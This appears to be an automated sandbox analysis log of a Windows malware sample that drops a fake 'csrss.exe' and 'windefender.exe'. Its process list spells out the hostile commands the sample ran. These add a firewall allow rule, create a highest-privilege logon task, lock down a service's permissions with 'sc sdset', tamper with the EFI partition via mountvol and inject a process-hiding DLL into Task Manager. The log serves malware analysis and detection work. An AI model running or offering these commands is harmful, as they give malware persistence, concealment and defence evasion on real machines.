          Source: 00000000.00000000.657671023.000000000098A000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000011.00000002.699181667.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: 00000019.00000002.706417494.0000000000991000.00000008.00020000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile created: C:\Windows\rssJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148827F035_2_00007FF6148827F0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489854935_2_00007FF614898549
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489D55835_2_00007FF61489D558
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489483035_2_00007FF614894830
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148958EC35_2_00007FF6148958EC
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A48D835_2_00007FF6148A48D8
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489F90835_2_00007FF61489F908
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489804035_2_00007FF614898040
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489F07035_2_00007FF61489F070
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A286435_2_00007FF6148A2864
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148841F035_2_00007FF6148841F0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489795035_2_00007FF614897950
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148AA17435_2_00007FF6148AA174
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A8A4C35_2_00007FF6148A8A4C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489C25C35_2_00007FF61489C25C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A5C1035_2_00007FF6148A5C10
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61488337035_2_00007FF614883370
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A03B035_2_00007FF6148A03B0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A74FC35_2_00007FF6148A74FC
          Source: EfiGuardDxe.efi.10.drStatic PE information: No import functions for PE file found
          Source: bootx64.efi.10.drStatic PE information: No import functions for PE file found
          Source: bootmgfw.efi.10.drStatic PE information: No import functions for PE file found
          Source: jkDmft1Qoe.exe, 00000000.00000000.657772523.00000000009FB000.00000008.00020000.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.678629448.00000000009FB000.00000008.00020000.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs jkDmft1Qoe.exe
          Source: C:\Windows\SysWOW64\sc.exeProcess token adjusted: Security
          Source: jkDmft1Qoe.exeVirustotal: Detection: 57%
          Source: jkDmft1Qoe.exeMetadefender: Detection: 34%
          Source: jkDmft1Qoe.exeReversingLabs: Detection: 46%
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile read: C:\Users\user\Desktop\jkDmft1Qoe.exeJump to behavior
          Source: jkDmft1Qoe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\jkDmft1Qoe.exe 'C:\Users\user\Desktop\jkDmft1Qoe.exe'
          Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess created: C:\Users\user\Desktop\jkDmft1Qoe.exe C:\Users\user\Desktop\jkDmft1Qoe.exe
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
          Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
          Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
          Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\rss\csrss.exe 'C:\Windows\rss\csrss.exe'
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
          Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\rss\csrss.exe 'C:\Windows\rss\csrss.exe'
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\windefender.exe C:\Windows\windefender.exe
          Source: C:\Windows\windefender.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: unknownProcess created: C:\Windows\windefender.exe C:\Windows\windefender.exe
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'Jump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yesJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5Jump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to behavior
          Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'silentdust.exe'
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrssJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@48/13@12/3
          Source: csrss.exe, 0000000A.00000003.825604620.00000000118F8000.00000004.00000001.sdmpBinary or memory string: SELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProHKEY_USERS\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\780aa3f8Microsoft Windows 10 ProDNS name does not exist.SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-002A-0000-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-002A-0000-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-002A-0409-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-002A-0409-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-0116-0409-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-0116-0409-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{929FBD26-9020-399B-9A7A-751D61F0B942}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{929FBD26-9020-399B-9A7A-751D61F0B942}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{196BB40D-1578-3D01-B289-BEFC77A11A1E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{196BB40D-1578-3D01-B289-BEFC77A11A1E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{19F7E289-17B8-44EC-A099-927507B6F739}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{19F7E289-17B8-44EC-A099-927507B6F739}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{213668DB-2263-4E2D-ABB8-487FD539130E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{213668DB-2263-4E2D-ABB8-487FD539130E}SOFTWARE\Microsoft
          Source: jkDmft1Qoe.exe, 00000004.00000002.680804308.0000000011890000.00000004.00000001.sdmpBinary or memory string: SELECT Name FROM Win32_Process WHERE Name = 'silentdust.exe'"C:\Windows\rss\csrss.exe"1935-2125563209-4053062332-1002\Software\Microsoft\Windows\CurrentVersion\Runrogram="C:\Windows\rss\csrss.exe" enable=yes"APPDATA=C:\Windows\system32\config\systemprofile\AppData\RoamingPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCAPPDATA=C:\Windows\system32\config\systemprofile\AppData\RoamingPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148827F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,35_2_00007FF6148827F0
          Source: C:\Windows\rss\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_01
          Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: jkDmft1Qoe.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: jkDmft1Qoe.exeStatic file information: File size 9054208 > 1048576
          Source: jkDmft1Qoe.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x29d400
          Source: jkDmft1Qoe.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2eaa00
          Source: jkDmft1Qoe.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x31a000
          Source: Binary string: Loader.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: symsrv.pdb source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.676233642.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000011.00000002.701096602.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000016.00000002.702361556.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.697442468.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.707266801.0000000000C57000.00000008.00020000.sdmp
          Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
